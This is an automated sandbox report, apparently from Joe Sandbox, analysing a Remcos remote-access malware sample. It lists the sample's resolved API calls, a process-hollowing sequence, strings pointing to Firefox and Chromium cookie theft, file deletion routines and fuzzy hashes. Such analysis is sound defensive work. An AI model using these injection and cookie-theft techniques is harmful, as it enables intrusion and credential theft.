68263 10003dc0 28 API calls 68262->68263 68264 1000388a 68263->68264 68264->68126 68266 10003dc0 28 API calls 68265->68266 68267 100038aa 68266->68267 68267->68126 68269 10007326 8 API calls 68268->68269 68270 100073dd 68268->68270 68269->68270 68271 1000739f 68269->68271 68270->68237 68271->68237 68271->68270 68272->68250 68273->68251 68279 100050c2 68278->68279 68288 10004c86 68278->68288 68280 10005121 68279->68280 68281 100050ce 68279->68281 68279->68288 68292 1000a5a6 28 API calls 2 library calls 68280->68292 68283 100050d2 68281->68283 68284 100050f3 68281->68284 68286 10004460 28 API calls 68283->68286 68284->68288 68291 10003c00 26 API calls 68284->68291 68286->68288 68289 10003ff0 28 API calls std::_Xinvalid_argument 68288->68289 68289->68164 68290->68166 68291->68288 70508 43a9a8 70511 43a9b4 _swprintf CallCatchBlock 70508->70511 70509 43a9c2 70524 445364 20 API calls _abort 70509->70524 70511->70509 70512 43a9ec 70511->70512 70519 444adc EnterCriticalSection 70512->70519 70514 43a9f7 70520 43aa98 70514->70520 70516 43a9c7 __fread_nolock ___std_exception_copy 70519->70514 70522 43aaa6 70520->70522 70521 43aa02 70525 43aa1f LeaveCriticalSection std::_Lockit::~_Lockit 70521->70525 70522->70521 70526 448426 36 API calls 2 library calls 70522->70526 70524->70516 70525->70516 70526->70522 70527 428da9 70532 428d2c 70527->70532 70529 428dbd _memcmp 70531 428df5 70529->70531 70540 428367 21 API calls ctype 70529->70540 70533 428d9d 70532->70533 70534 428d37 70532->70534 70533->70529 70534->70533 70541 4284bc 21 API calls ctype 70534->70541 70536 428d78 70536->70533 70542 428cbd 70536->70542 70540->70531 70541->70536 70543 428ce4 70542->70543 70544 428cea 70543->70544 70549 428bf9 70543->70549 70548 4284bc 21 API calls ctype 70544->70548 70547 428bf9 22 API calls 70547->70544 70548->70533 70551 428c1e ctype ___scrt_fastfail 70549->70551 70550 428ca2 70550->70547 70551->70550 70553 428a9e 70551->70553 70558 41a46a 70553->70558 70556 428abb 70557 428aed 
70556->70557 70561 427655 70556->70561 70557->70550 70559 4395ca 21 API calls 70558->70559 70560 41a471 70559->70560 70560->70556 70564 441cc0 70561->70564 70569 441c82 21 API calls 4 library calls 70564->70569 70566 441ccb 70568 42765b 70566->70568 70570 441a91 20 API calls 3 library calls 70566->70570 70568->70557 70569->70566 70570->70568 68293 402bcc 68294 402bd7 68293->68294 68295 402bdf 68293->68295 68301 403315 68294->68301 68296 402beb 68295->68296 68308 4015d3 68295->68308 68302 4015d3 22 API calls 68301->68302 68303 40332a 68302->68303 68304 402bdd 68303->68304 68305 40333b 68303->68305 68318 43a864 11 API calls _abort 68305->68318 68307 43a863 68310 43361d 68308->68310 68311 402be9 68310->68311 68314 43363e std::_Facet_Register 68310->68314 68319 43a89c 68310->68319 68326 442210 7 API calls 2 library calls 68310->68326 68313 433dfc std::_Facet_Register 68328 437be7 RaiseException 68313->68328 68314->68313 68327 437be7 RaiseException 68314->68327 68317 433e19 68318->68307 68325 446b0f _strftime 68319->68325 68320 446b4d 68330 445364 20 API calls _abort 68320->68330 68321 446b38 RtlAllocateHeap 68323 446b4b 68321->68323 68321->68325 68323->68310 68325->68320 68325->68321 68329 442210 7 API calls 2 library calls 68325->68329 68326->68310 68327->68313 68328->68317 68329->68325 68330->68323 70571 42ea2e 70572 42ea39 70571->70572 70573 42ea4d 70572->70573 70575 431fd3 70572->70575 70576 431fe2 70575->70576 70578 431fde 70575->70578 70579 43fcea 70576->70579 70578->70573 70580 44b9ce 70579->70580 70581 44b9e6 70580->70581 70582 44b9db 70580->70582 70584 44b9ee 70581->70584 70591 44b9f7 _strftime 70581->70591 70592 446b0f 70582->70592 70585 446ad5 _free 20 API calls 70584->70585 70588 44b9e3 70585->70588 70586 44ba21 RtlReAllocateHeap 70586->70588 70586->70591 70587 44b9fc 70599 445364 20 API calls _abort 70587->70599 70588->70578 70591->70586 70591->70587 70600 442210 7 API calls 2 library calls 70591->70600 70593 446b4d 70592->70593 70594 446b1d _strftime 

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
• GetProcAddress.KERNEL32(00000000), ref: 0041BD11
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
• GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
• LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
• GetProcAddress.KERNEL32(00000000), ref: 0041BD40
• LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
• GetProcAddress.KERNEL32(00000000), ref: 0041BD54
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
• GetProcAddress.KERNEL32(00000000), ref: 0041BD68
• LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
• GetProcAddress.KERNEL32(00000000), ref: 0041BD78
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
• GetProcAddress.KERNEL32(00000000), ref: 0041BD88
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
• GetProcAddress.KERNEL32(00000000), ref: 0041BD98
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
• GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
• GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
• GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
• GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
• GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
• GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
• GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
• GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
• GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
• GetProcAddress.KERNEL32(00000000), ref: 0041BE08
• LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
• GetProcAddress.KERNEL32(00000000), ref: 0041BE19
• LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE26
• GetProcAddress.KERNEL32(00000000), ref: 0041BE29
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE3B
• GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
• GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE4B
• GetProcAddress.KERNEL32(00000000), ref: 0041BE4E
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE60
• GetProcAddress.KERNEL32(00000000), ref: 0041BE63
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE70
• GetProcAddress.KERNEL32(00000000), ref: 0041BE73
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                                                                                                                                                                                                                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                                                                                                                                                                                                                              • API String ID: 384173800-625181639
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 9dbe04c74af77a7e1246f7e7b4568b240d3cb110e698a9ec5713b860520f9e80
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC31EEA0E4031C7ADA107FB69C49E5B7E9CD940B953110827B508D3162FB7DA980DEEE

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe,00000104), ref: 0040D790
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                                                                                                                                                                                                                              • String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe$Exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$fyhstga-ONSWMZ$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                                                                                                                                                                                                                                                              • API String ID: 2830904901-2899612153
                                                                                                                                                                                                                                                                                                                              • Opcode ID: a28a479395dd4b36e7fa7ec9b6143bb4397350d073e7f97df4225f93239b266a
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 3e021a1a4b13f59cbd2257f1e4af8b1458c06fff599f70b9144805750af3581d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a28a479395dd4b36e7fa7ec9b6143bb4397350d073e7f97df4225f93239b266a
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31329260B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                                                                                                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                                                                                                                                                                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                                                                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                                                                                                                                                                                                                                                              • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004173E6
                                                                                                                                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(?,?), ref: 0041740E
                                                                                                                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041742E
                                                                                                                                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                                                                                                                                                                                                                                                                              • NtClose.NTDLL(?), ref: 0041744A
                                                                                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                                                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,00000000), ref: 00417496
                                                                                                                                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                                                                                                                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                                                                                                                                                                                                                                                              • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                                                                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                                                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(00000000), ref: 004175AC
                                                                                                                                                                                                                                                                                                                              • NtClose.NTDLL(?), ref: 004175B6
                                                                                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 004175C7
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                                                                                                                                                                                                                                                                              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                                                                                                                                                                                                                                                                                                              • API String ID: 3150337530-108836778
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 0508007fc5a19f335f37bc9d6881170284180ec94406780ecb3836aa2a2a6048
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 2a1bc7bdc729258c18c32f0bb95ec7660c06bfb5025054df3919bc75ccc59624
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0508007fc5a19f335f37bc9d6881170284180ec94406780ecb3836aa2a2a6048
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFA17CB1508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E779E984CB6A

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: ExistsFilePath
• String ID: 0$RPe%$chrome.exe$invalid vector<T> subscript$msedge.exe$opera.exe$/L$TS$YM
• API String ID: 1174141254-1233981215
• Opcode ID: 22eea768eb0ac1053ae5efbe52efbd381925fc3d587047621c43a0140cdd6f4b
• Instruction ID: ec441cf6cc5d574dc3d9e533db66c2798fe9b2d1f890f10e919fe81ba7d73607
• Opcode Fuzzy Hash: 22eea768eb0ac1053ae5efbe52efbd381925fc3d587047621c43a0140cdd6f4b
• Instruction Fuzzy Hash: 4572D174D00208DBFB19DB64CC55BEE77B5EF41344F208198E406AB296DB71AF49CBA2
APIs
• FindFirstFileW.KERNEL32(00000000,-00000002,-00000002), ref: 10005CB2
• FindNextFileW.KERNELBASE(00000000,?), ref: 10005D2C
• PathFileExistsW.SHLWAPI(?), ref: 10005E68
• FindNextFileW.KERNEL32(00000000,00000010), ref: 10005E8C
• FindClose.KERNEL32(00000000), ref: 10005E97
• FindClose.KERNEL32(00000000), ref: 10005EDA
Strings
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: Find$File$CloseNext$ExistsFirstPath
• String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
• API String ID: 913281501-405221262
• Opcode ID: 275ccd61f0080d118aa158f5f31b7f4775243eb66532934bf8ec06ad449fd071
• Instruction ID: d69103c2b3bb7b0ef1279a73142a9cc332cbad18a963587697917916d0a93de4
• Opcode Fuzzy Hash: 275ccd61f0080d118aa158f5f31b7f4775243eb66532934bf8ec06ad449fd071
• Instruction Fuzzy Hash: 8181D270D00249DAFB14DFA0DC49BEEB7B5FF14385F61416AE805A7255EB32AE44CB20
APIs
• FindFirstFileW.KERNEL32(?,?,?,00000000,76230F00), ref: 10007ED1
• FindNextFileW.KERNELBASE(00000000,?,?,00000000,76230F00), ref: 10007F0A
• RemoveDirectoryW.KERNEL32(?,?,00000000,76230F00), ref: 10007FFA
• SetFileAttributesW.KERNEL32(?,00000080,?,00000000,76230F00), ref: 1000802D
• DeleteFileW.KERNEL32(?,?,00000000,76230F00), ref: 1000803A
• GetLastError.KERNEL32(?,00000000,76230F00), ref: 1000806D
• FindClose.KERNEL32(00000000,?,00000000,76230F00), ref: 10008079
• RemoveDirectoryW.KERNEL32(?,?,00000000,76230F00), ref: 10008082
• FindClose.KERNEL32(00000000,?,00000000,76230F00), ref: 1000808C
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
• String ID:
• API String ID: 2341273852-0
• Opcode ID: 924e4a1749d0d59d34f62a1f8ef7dddde271016198b3f9fb598245e3bb22b1f8
• Instruction ID: 5879e413a2d9e2f3862ed2fa56462b92cd9797ab3db8e6e954221e2a185392ff
• Opcode Fuzzy Hash: 924e4a1749d0d59d34f62a1f8ef7dddde271016198b3f9fb598245e3bb22b1f8
• Instruction Fuzzy Hash: AC61F03890025B8AEB50DF64C885BF6B3B5FF143D4F5141E9EC0997295EB329E86CB60
APIs
• lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 02831137
• lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 02831151
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 0283115C
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 0283116D
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 0283117C
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 02831193
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 028311D0
• FindClose.KERNEL32(00000000), ref: 028311DB
Memory Dump Source
• Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: lstrlen$Find$File$CloseFirstNextlstrcat
• String ID:
• API String ID: 1083526818-0
